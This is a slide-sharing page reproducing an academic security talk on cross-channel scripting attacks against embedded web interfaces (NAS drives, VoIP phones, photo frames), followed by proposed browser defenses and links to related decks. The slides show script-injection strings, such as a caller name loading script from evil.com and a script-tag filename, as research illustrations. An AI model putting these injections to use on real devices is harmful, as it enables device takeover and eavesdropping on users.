cross channel scripting
play

Cross-Channel Scripting e t u p m Impact on Embedded Web - PowerPoint PPT Presentation

Dec 03, 2023 •397 likes •1.09k views

b a L y t i r u c e S r Cross-Channel Scripting e t u p m Impact on Embedded Web Interfaces o C d r o f Hristo Bojinov Elie Bursztein Dan Boneh n a Stanford Computer Security Lab t S Cross-channel scripting

  1. b a L y t i r u c e S r Cross-Channel Scripting e t u p m Impact on Embedded Web Interfaces o C d r o f Hristo Bojinov Elie Bursztein Dan Boneh n a Stanford Computer Security Lab t S

  2. Cross-channel scripting Vulnerable System Service A Service B State Protocol A Protocol B

  3. Cross-channel scripting Vulnerable System Injection Service A Service B State Protocol A Protocol A Protocol B e.g. iCal

  4. Cross-channel scripting Vulnerable System Injection Service A Service B State Protocol A Protocol A Protocol B e.g. iCal

  5. Cross-channel scripting Vulnerable System Injection Service A Service B State Protocol A Protocol A Protocol B e.g. iCal

  6. Cross-channel scripting Vulnerable System Injection Execution Service A Service B State Protocol A Protocol A Protocol B Protocol B e.g. iCal e.g. HTTP

  7. Cross-channel scripting Vulnerable System Injection Execution Service A Service B State Protocol A Protocol A Protocol B Protocol B e.g. iCal e.g. HTTP XCS: a pervasive attack class ‣ secure services ≠ secure system

  8. Cross-channel scripting LaCie Ethernet disk mini ‣ Share access control ‣ Web interface ‣ Public FTP

  9. Cross-channel scripting FTP server NAS Upload a file: <script>..</script>.pdf Attacker

  10. Cross-channel scripting FTP file server system NAS Upload a file: <script>..</script>.pdf Attacker

  11. Cross-channel scripting FTP file Web server system App NAS Upload a file: Reflect the filename: <script>..</script>.pdf <script>..</script>.pdf Attacker Admin Browser Admin Browser

  12. Cross-channel scripting

  13. Talk overview Part 1: Many examples of XCS ‣ Phones: 5 XCS vulnerabilities in 2 phones ‣ Embedded: 23 devices, 26 XCS vulnerabilities ‣ RESTful APIs: 2 major APIs, 2 XCS vulnerabilities

  14. Talk overview Part 1: Many examples of XCS ‣ Phones: 5 XCS vulnerabilities in 2 phones ‣ Embedded: 23 devices, 26 XCS vulnerabilities ‣ RESTful APIs: 2 major APIs, 2 XCS vulnerabilities Part 2: Defenses against XCS

  15. More XCS Examples e c u r i t y L a b n f o r d C o m p u t e r S S t a

  16. Embedded web interfaces?

  17. Embedded vs. public web servers Growth 300 Internet Embedded (NAS and photo frame only) 225 ) s n o 150 i l l i M ( 75 0 2008 2009 2010 2011 2012 2013 Data : - Parks associates - Netcraft

  18. Web management interfaces Managing embedded devices via a web interface: ✓ Easier for users ✓ Cheaper for vendors

  19. Recipe for a disaster Vendors build their own web applications Standard web server (sometimes) ‣ Custom web application stack ‣ Weak web security ‣ New features/services added at a fast pace Vendors compete on number of services in product ‣ Interactions between services ➽ vulnerabilities ‣

  20. Outcome Vulnerabilities in every device we audited

  21. SIP XCS VoIP phone ‣ Linksys SPA942 ‣ Web interface ‣ SIP support ‣ Call logs

  22. SIP XCS

  23. SIP XCS 1 Attacker makes a call as “<script src="//evil.com/"></script>”

  24. SIP XCS 1 Attacker makes a call as “<script src="//evil.com/"></script>” 2 Administrator accesses web interface

  25. SIP XCS 1 Attacker makes a call as “<script src="//evil.com/"></script>” 2 Administrator accesses web interface Internet 3 Payload executes

  26. SIP XCS Outcome: phone reconfiguration, VoIP wiretapping...

  27. Photo frame XCS WiFi photo frame ‣ Samsung SPF85V ‣ RSS / URL feed ‣ Windows Live ‣ WMV / AVI

  28. Photo frame XCS Internet

  29. Photo frame XCS 1 Attacker infects via CSRF Internet

  30. Photo frame XCS 1 Attacker infects via CSRF Internet 2 User connects to manage

  31. Photo frame XCS 1 Attacker infects via CSRF Internet Frame Error! 3 Payload executes Call Support: 1-900-PWNED 2 User connects to manage

  32. Devices as stepping stones

  33. Devices as stepping stones 1 Administer the device

  34. Devices as stepping stones 1 Administer the device 2 Browse internet Internet

  35. Devices as stepping stones 1 Administer the device 2 Browse internet Internet P O S T ( e . g . v i a A d s ) 3 T r i g g e r

  36. Devices as stepping stones 4 Infect the device 2 Browse internet Internet P O S T ( e . g . v i a A d s ) 3 T r i g g e r

  37. Devices as stepping stones 5 Access files

  38. Devices as stepping stones 6 Send malicious payload 5 Access files

  39. Devices as stepping stones 6 Send malicious payload 5 Access files 7 Attack local network

  40. Another boring NAS device? SOHO NAS ‣ Buffalo LS-CHL ‣ BitTorrent support!

  41. Massive exploitation Internet

  42. Massive exploitation Create a bad torrent Internet Famous_movie.torrent

  43. Massive exploitation Internet

  44. Massive exploitation Internet

  45. Massive exploitation Internet

  46. Peer-to-peer XCS!

  47. Defenses e c u r i t y L a b n f o r d C o m p u t e r S S t a

  48. Cross-channel scripting Vulnerable System Injection Execution Service A Service B Protocol A Protocol A Protocol B Protocol B

  49. Cross-channel scripting Vulnerable System Injection Execution Service A Service B Protocol A Protocol A Protocol B Protocol B Difficult

  50. Cross-channel scripting Vulnerable System Injection Execution Service A Service B Protocol A Protocol A Protocol B Protocol B Difficult Feasible

  51. Security policies in browsers

  52. Security policies in browsers Strict Transport Security ‣ ForceHTTPS [JB’08] ‣ Stateful, and site-wide ‣ Recently adopted by PayPal ‣ Several browser implementations

  53. Security policies in browsers Same Origin Mutual Approval [OWvOS’08] ‣ Manifest delivery, stateless, site-wide

  54. Security policies in browsers Same Origin Mutual Approval [OWvOS’08] ‣ Manifest delivery, stateless, site-wide Mozilla Content Security Policy ‣ Header delivery, stateless, fine-grained

  55. Security policies in browsers Same Origin Mutual Approval [OWvOS’08] ‣ Manifest delivery, stateless, site-wide Mozilla Content Security Policy ‣ Header delivery, stateless, fine-grained SiteFirewall ‣ Header delivery, stateful, site-wide

  56. SiteFirewall SiteFirewall (a Firefox extension), prevents internal websites from accessing the Internet. Internet

  57. SiteFirewall SiteFirewall (a Firefox extension), prevents internal websites from accessing the Internet. Internet

  58. SiteFirewall Injected script can issue requests at will: <script src=”http://evil.com”> Before

  59. SiteFirewall Page interactions with the Internet blocked. After

  60. Thinking beyond cookies

  61. Thinking beyond cookies Policy delivery mechanisms: ‣ Manifest files, cookies, custom headers, DNS, certs

  62. Thinking beyond cookies Policy delivery mechanisms: ‣ Manifest files, cookies, custom headers, DNS, certs Different types of browser state: ‣ Cookies for web application state ‣ Policy store for web site security policies

  63. Conclusion e c u r i t y L a b n f o r d C o m p u t e r S S t a

  64. A growing threat As seen on Twitter...

  65. A growing threat ... and a smartphone near you.

  66. Conclusion Rise of multi-protocol devices: XCS Rise of browser-OS: 24x7 exploitability Thanks to Eric Lovett and Parks Associates!

  67. Conclusion Rise of multi-protocol devices: XCS Rise of browser-OS: 24x7 exploitability Recommendations ‣ HTTP: cross-site policy standard ‣ Browser: security policy store (non-cookie) Thanks to Eric Lovett and Parks Associates!

  68. Questions? b a L y t i r u c e S r e t u p m o C d r o f n a t S http://seclab.stanford.edu

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Cross-Site Scripting Attack (XSS) Outline The Cross-Site Scripting attack Reflected

Cross-Site Scripting Attack (XSS) Outline The Cross-Site Scripting attack Reflected

Cross-Site Scripting Attack (XSS) Outline The Cross-Site Scripting attack Reflected XSS Persistent XSS Damage done by XSS attacks XSS attacks to befriend with others XSS attacks to change other peoples

3.65k views • 37 slides
Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild Marius

Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild Marius

Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild Marius Ste ff ens German OWASP Day 2018 joint work with Christian Rossow, Martin Johns and Ben Stock Dimensions of Cross-Site Scripting Server Client

413 views • 14 slides
Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense Yacin Nadji

Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense Yacin Nadji

Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense Yacin Nadji Prateek Saxena Dawn Song Illinois Institute UC Berkeley UC Berkeley Of Technology 1 A Cross-Site Scripting Attack Hi Joe, &lt;img src=&gt;

569 views • 42 slides
SQL Injection Last Few Lectures XSS - Cross-site scripting XSRF/CSRF - Cross-site request

SQL Injection Last Few Lectures XSS - Cross-site scripting XSRF/CSRF - Cross-site request

SQL Injection Last Few Lectures XSS - Cross-site scripting XSRF/CSRF - Cross-site request forgery Code Injection Attacks Attacker executes arbitrary code on server Programming the program Not sanitizing user

287 views • 11 slides
The DOM Scripting Toolkit: jQuery Remy Sharp Left Logic Why JS Libraries? DOM scripting

The DOM Scripting Toolkit: jQuery Remy Sharp Left Logic Why JS Libraries? DOM scripting

The DOM Scripting Toolkit: jQuery Remy Sharp Left Logic Why JS Libraries? DOM scripting made easy Why JS Libraries? DOM scripting made easy Cross browser work done for you Why JS Libraries? DOM scripting made easy Cross

1.46k views • 92 slides
Lecture 17: Scripting and Steering David Bindel 28 Mar 2010 Overview of today Scripting

Lecture 17: Scripting and Steering David Bindel 28 Mar 2010 Overview of today Scripting

Lecture 17: Scripting and Steering David Bindel 28 Mar 2010 Overview of today Scripting sales pitch + typical uses in scientific code Truth in advertising Cross-language communication mechanisms Tool support Some simple

336 views • 21 slides
Web Security, Summer Term 2012 Cross Site Scripting - XSS Dr. E. Benoist Sommer Semester Web

Web Security, Summer Term 2012 Cross Site Scripting - XSS Dr. E. Benoist Sommer Semester Web

IIG University of Freiburg Web Security, Summer Term 2012 Cross Site Scripting - XSS Dr. E. Benoist Sommer Semester Web Security, Summer Term 2012 5 Cross Site Scripting 1 Table of Contents Presentation: Inject Javascript in a Page

506 views • 26 slides
Outline Cross-site scripting CSci 5271 More cross-site risks Introduction to Computer Security

Outline Cross-site scripting CSci 5271 More cross-site risks Introduction to Computer Security

Outline Cross-site scripting CSci 5271 More cross-site risks Introduction to Computer Security Web security, part 2 Announcements intermission Stephen McCamant Confidentiality and privacy University of Minnesota, Computer Science &amp;

892 views • 6 slides
Outline Cross-site scripting Announcements intermission CSci 5271 More cross-site risks

Outline Cross-site scripting Announcements intermission CSci 5271 More cross-site risks

Outline Cross-site scripting Announcements intermission CSci 5271 More cross-site risks Introduction to Computer Security Confidentiality and privacy Day 19: Web security, part 2 Stephen McCamant Even more web risks University of

386 views • 11 slides
Outline Cross-site scripting, contd More cross-site risks CSci 5271 Introduction to Computer

Outline Cross-site scripting, contd More cross-site risks CSci 5271 Introduction to Computer

Outline Cross-site scripting, contd More cross-site risks CSci 5271 Introduction to Computer Security Announcements intermission Web security and crypto failure combined Confidentiality and privacy lecture Even more web risks Stephen

435 views • 10 slides
Writing Secure Code Wash all user-submitted data Vulnerabilities XSS - Cross-site scripting

Writing Secure Code Wash all user-submitted data Vulnerabilities XSS - Cross-site scripting

Writing Secure Code Wash all user-submitted data Vulnerabilities XSS - Cross-site scripting Executing unauthorized code XSRF - Cross-site request forgery Remote execution for logged-in users SQL Injection A malicious variable placed into a

681 views • 18 slides
Cyber@UC Meeting 43 Cross-site scripting (XSS) CEH Cryptography and Recon If Youre New!

Cyber@UC Meeting 43 Cross-site scripting (XSS) CEH Cryptography and Recon If Youre New!

Cyber@UC Meeting 43 Cross-site scripting (XSS) CEH Cryptography and Recon If Youre New! Join our Slack ucyber.slack.com SIGN IN! Feel free to get involved with one of our committees: Content, Finance, Public Affairs, Outreach,

560 views • 26 slides
CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin ini CEH, ITIL L V3, 3, CCNA, CCNP, CASP, PCI-DS DSS.. .. Lead Security Researcher @ Netwatch Technologies Project Consultant, Information

377 views • 20 slides
Cross-Site Scripting XSS Many sites allow users to upload information Blogs, photo

Cross-Site Scripting XSS Many sites allow users to upload information Blogs, photo

Cross-Site Scripting XSS Many sites allow users to upload information Blogs, photo sharing, Facebook, etc. Which gets permanently stored And displayed Attack based on uploading a script Other users inadvertently download

428 views • 14 slides
Cross-Site Scripting XSS Many sites allow users to upload information Blogs, photo

Cross-Site Scripting XSS Many sites allow users to upload information Blogs, photo

Cross-Site Scripting XSS Many sites allow users to upload information Blogs, photo sharing, Facebook, etc. Which gets permanently stored And displayed Attack based on uploading a script Other users inadvertently download

512 views • 15 slides
A3: Cross-site Scripting (XSS) (JavaScript injection) Prevalence Stock et.al. How the Web

A3: Cross-site Scripting (XSS) (JavaScript injection) Prevalence Stock et.al. How the Web

A3: Cross-site Scripting (XSS) (JavaScript injection) Prevalence Stock et.al. How the Web Tangled Itself: Uncovering the History of Client- Side Web (In)Security, USENIX Security 2017 But first..JavaScript security Pages now loaded

482 views • 46 slides
Batch Systems Running your jobs on an HPC machine Outline What are batch systems? Why are

Batch Systems Running your jobs on an HPC machine Outline What are batch systems? Why are

Batch Systems Running your jobs on an HPC machine Outline What are batch systems? Why are they needed? How to run jobs on an HPC machine via a batch system: Concepts Resource scheduling and job execution Job submission

543 views • 31 slides
Scripting and Extending Nmap and Wireshark with Lua by Gerald Combs &amp; Gordon Fyodor

Scripting and Extending Nmap and Wireshark with Lua by Gerald Combs &amp; Gordon Fyodor

Insecure.Org Insecure.Org Scripting and Extending Nmap and Wireshark with Lua by Gerald Combs &amp; Gordon Fyodor Lyon Sharkfest 2010 June 16, 1:15 PM http://insecure.org/presentations/Sharkfest10/ Insecure.Org Insecure.Org Nmap

278 views • 16 slides
WoT Runtime, Scripting, Bindings Zoltan Kis, Intel WoT Runtime WoT RT Script 1 Things Things

WoT Runtime, Scripting, Bindings Zoltan Kis, Intel WoT Runtime WoT RT Script 1 Things Things

WoT Runtime, Scripting, Bindings Zoltan Kis, Intel WoT Runtime WoT RT Script 1 Things Things Process view WoT RT: one process Bindings: separate processes TDs System APIs / OS Kernel Script n System APIs Socket

359 views • 4 slides
Schnorr and Taproot in Lightning 2018-09-01 Jonas Nick jonasd.nick@gmail.com

Schnorr and Taproot in Lightning 2018-09-01 Jonas Nick jonasd.nick@gmail.com

Schnorr and Taproot in Lightning 2018-09-01 Jonas Nick jonasd.nick@gmail.com https://nickler.ninja @n1ckler Objective: Increase Robustness Privacy Scalability Consensus Scriptless Scripts approach: different payment types

897 views • 24 slides
Behavior Trees: Three Ways of Cultivating Game AI BEHAVIOR TREES APPLIED! Halo 3 &amp; ODST

Behavior Trees: Three Ways of Cultivating Game AI BEHAVIOR TREES APPLIED! Halo 3 &amp; ODST

Alex J. Champandard Michael Dawe David Hernandez-Cerpa AiGameDev.com Big Huge Games LucasArts Behavior Trees: Three Ways of Cultivating Game AI BEHAVIOR TREES APPLIED! Halo 3 &amp; ODST [PROTOTYPE] Spore GTA: Chinatown Wars

769 views • 44 slides
J-FORCE : FORCED EXECUTION ON JAVASCRIPT Kyungtae Kim 1 , I Luk Kim 1 , Chung-Hwan Kim 1 , Yonghwi

J-FORCE : FORCED EXECUTION ON JAVASCRIPT Kyungtae Kim 1 , I Luk Kim 1 , Chung-Hwan Kim 1 , Yonghwi

J-FORCE : FORCED EXECUTION ON JAVASCRIPT Kyungtae Kim 1 , I Luk Kim 1 , Chung-Hwan Kim 1 , Yonghwi Kwon 1 , Yunhui Zheng 2 , Xiangyu Zhang 1 , Dongyan Xu 1 1 Department of Computer Science, Purdue University 2 IBM T.J. Watson Research Center, USA

624 views • 21 slides
Oasys Post-Processing: Did you know?... Back to Contents Slide 1 Contents Shortcuts

Oasys Post-Processing: Did you know?... Back to Contents Slide 1 Contents Shortcuts

Oasys Post-Processing: Did you know?... Back to Contents Slide 1 Contents Shortcuts Quick Find Integration with PRIMER Undocking Menus User Defined Components Material Extra Data FAST-TCF Curve Table

1.58k views • 81 slides
Quickscript A plugin to enhance DrRacket A plugin to enhance DrRacket Laurent Orseau

Quickscript A plugin to enhance DrRacket A plugin to enhance DrRacket Laurent Orseau

Quickscript A plugin to enhance DrRacket A plugin to enhance DrRacket Laurent Orseau RacketCon 2018 Laurent Orseau RacketCon 2018 Thanks to Stephen de Gabrielle for the name and some help Thanks to Stephen de Gabrielle for the name and

865 views • 47 slides

More recommend